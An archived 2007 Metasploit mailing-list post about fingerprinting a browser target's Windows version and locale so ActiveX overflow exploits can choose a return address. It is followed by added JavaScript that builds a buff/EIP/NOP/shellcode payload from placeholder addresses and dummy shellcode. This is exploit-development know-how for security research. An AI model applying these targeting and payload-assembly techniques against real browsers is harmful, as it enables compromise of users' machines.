Metasploit mailing list archives
MoAxB in the MSF world: target OS detection with JavaScript
From: jerome.athias at free.fr (Jerome Athias)
Date: Fri, 18 May 2007 14:11:33 +0200
Hi there,

Since multiple vulnerabilities are being released during the MoAxB - Month of ActiveX Bug [Ref1], some guys have started to release exploit modules for the Metasploit Framework. For example:

NCTAudioFile2.AudioFile ActiveX Remote Stack Overfl0w
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/bearshare_setformatlikesample.rb

This one is interesting due to the number of software packages using it, ref: http://www.milw0rm.com/exploits/3728 (and http://www.milw0rm.com/exploits/3808 ).

When using a return address taken from a Windows DLL, OS fingerprinting becomes a key point. Fortunately, when targeting a browser, JavaScript can help to drastically increase the chance of a successful exploitation. [Ref2] [Ref3]

For this, I released the os_detect JavaScript script:
https://www.securinfos.info/jerome/os_detect.js

By using the included giveMeRET() function in an exploit, it will retrieve the Windows version and locale of the target and return a good ret address. To obfuscate the exploit code, people should use both the rand_text_alpha() and obfuscate_js() functions. [Ref4]

os_detect.js will be enhanced soon (using arrays, adding support for more opcodes, adding support for more locales, etc.).

People can help me to improve the return address database by following these steps:
1) Download this package on a Windows box: https://www.securinfos.info/OPCODES_LIST.zip
2) Extract it and run the OPCODES_LIST.bat script
3) Send me the results file OPCODES_LIST.txt

To help people write reliable ActiveX exploit modules for the Metasploit Framework, I have also coded some useful functionality in the MSF eXploit Builder tool:
https://www.securinfos.info/metasploit/MSF_XB.php
i.e.:
* it now retrieves automatically the CLSID of a given .OCX/.DLL file from the registry
* it is now possible to enter the design of the exploit (i.e. buff + EIP + nop + shellcode + nop) and it will automatically generate the matching code
* and others ;-) -- available soon

References:
[Ref1] MoAxB: http://moaxb.blogspot.com/
[Ref2] Metasploit Browser Assessment: http://www.metasploit.com/research/misc/browserscan/
[Ref3] http://kartoush.ibelgique.com/pdf/SSTIC06-article-Delalleau_Feil-Vulnerabilite_des_postes_clients.pdf (French)
[Ref4] http://blog.metasploit.com/2007/04/heaplib-support-added-to-metasploit-3.html

Again, you can find copies of vulnerable software versions at:
https://www.securinfos.info/old-softwares-vulnerable.php

Enjoy! I hope it will help before an AJAX request to the msfopcodes database is released :p

/JA

Note: I'll appreciate a little credit if you use some return addresses from os_detect.js ;-) Thanks.

Regards to my friends, you know who you are ;-)
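The post describes two things without showing code: a giveMeRET()-style helper that fingerprints the Windows version and locale from the browser and picks a matching return address, and the "buff + EIP + nop + shellcode + nop" layout that MSF eXploit Builder generates. The block below is an added example written for this page; it is not os_detect.js and not code from Jerome Athias or the Metasploit project. It takes the user-agent and locale strings as arguments so it runs under Node without a browser (in IE you would pass navigator.userAgent and navigator.userLanguage). The RET_TABLE addresses are constructed placeholder values for illustration only, not real opcode addresses for any Windows build, and the two-byte int3 shellcode is likewise constructed.

```javascript
// Added example: OS/locale fingerprinting from the user-agent string and a
// ret-address lookup in the style of giveMeRET(), plus assembly of the
// buff + EIP + nop + shellcode + nop layout. Not the original os_detect.js.

// Windows NT version token in the UA -> short OS name (only versions of the era).
const WINDOWS_VERSIONS = {
  "5.0": "win2000",
  "5.1": "winxp",
  "5.2": "win2003",
  "6.0": "vista",
};

// Parse "Windows NT x.y" out of a user-agent string, e.g.
// "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" -> "winxp".
// Returns null for non-Windows or unknown versions.
function detectWindowsVersion(userAgent) {
  const m = /Windows NT (\d+\.\d+)/.exec(userAgent || "");
  if (!m) return null;
  return WINDOWS_VERSIONS[m[1]] || null;
}

// Normalise a browser locale ("en-US", "fr", "FR") to a lowercase language tag.
function detectLocale(lang) {
  if (!lang) return null;
  return lang.split("-")[0].toLowerCase();
}

// Constructed placeholder table: (os, locale) -> return address.
// These values are NOT real addresses; a real table is built per DLL build.
const RET_TABLE = {
  winxp:   { en: 0x41414141, fr: 0x42424242 },
  win2003: { en: 0x43434343 },
  vista:   { en: 0x44444444 },
};

// Return the ret address for the detected target, or null when the
// (version, locale) pair is not in the table. A caller should abort on null
// instead of firing the payload with a wrong address and crashing the browser.
function giveMeRet(userAgent, lang, table) {
  const os = detectWindowsVersion(userAgent);
  const locale = detectLocale(lang);
  if (!os || !locale || !table[os]) return null;
  const ret = table[os][locale];
  return ret === undefined ? null : ret;
}

// Encode a 32-bit value as the little-endian %uXXXX pair that unescape()
// expands to raw bytes in IE: 0x41424344 -> "%u4344%u4142".
function toUnescapeLE(value) {
  const lo = value & 0xffff;
  const hi = (value >>> 16) & 0xffff;
  return "%u" + lo.toString(16).padStart(4, "0") +
         "%u" + hi.toString(16).padStart(4, "0");
}

// Assemble buff + EIP + nop + shellcode + nop as a byte array.
// offset: bytes of filler before the saved EIP; shellcode: array of bytes.
// Returns null if no ret address was resolved.
function buildPayload(ret, offset, shellcode, nopCount) {
  if (ret === null) return null;
  const out = [];
  for (let i = 0; i < offset; i++) out.push(0x41);                  // buff (filler)
  out.push(ret & 0xff, (ret >>> 8) & 0xff,
           (ret >>> 16) & 0xff, (ret >>> 24) & 0xff);               // EIP, little-endian
  for (let i = 0; i < nopCount; i++) out.push(0x90);                // nop sled
  for (const b of shellcode) out.push(b);                           // shellcode
  for (let i = 0; i < nopCount; i++) out.push(0x90);                // trailing nops
  return Uint8Array.from(out);
}

// Stand-alone usage with a constructed IE6/XP user-agent and French locale.
const SAMPLE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)";
const SAMPLE_SHELLCODE = [0xcc, 0xcc];   // constructed: two int3 breakpoints
const sampleRet = giveMeRet(SAMPLE_UA, "fr", RET_TABLE);
const samplePayload = buildPayload(sampleRet, 8, SAMPLE_SHELLCODE, 4);
```

Because every unknown version/locale pair yields null rather than a guessed address, the exploit page can fall back to doing nothing on targets it has no address for, which is the reliability property the post is after.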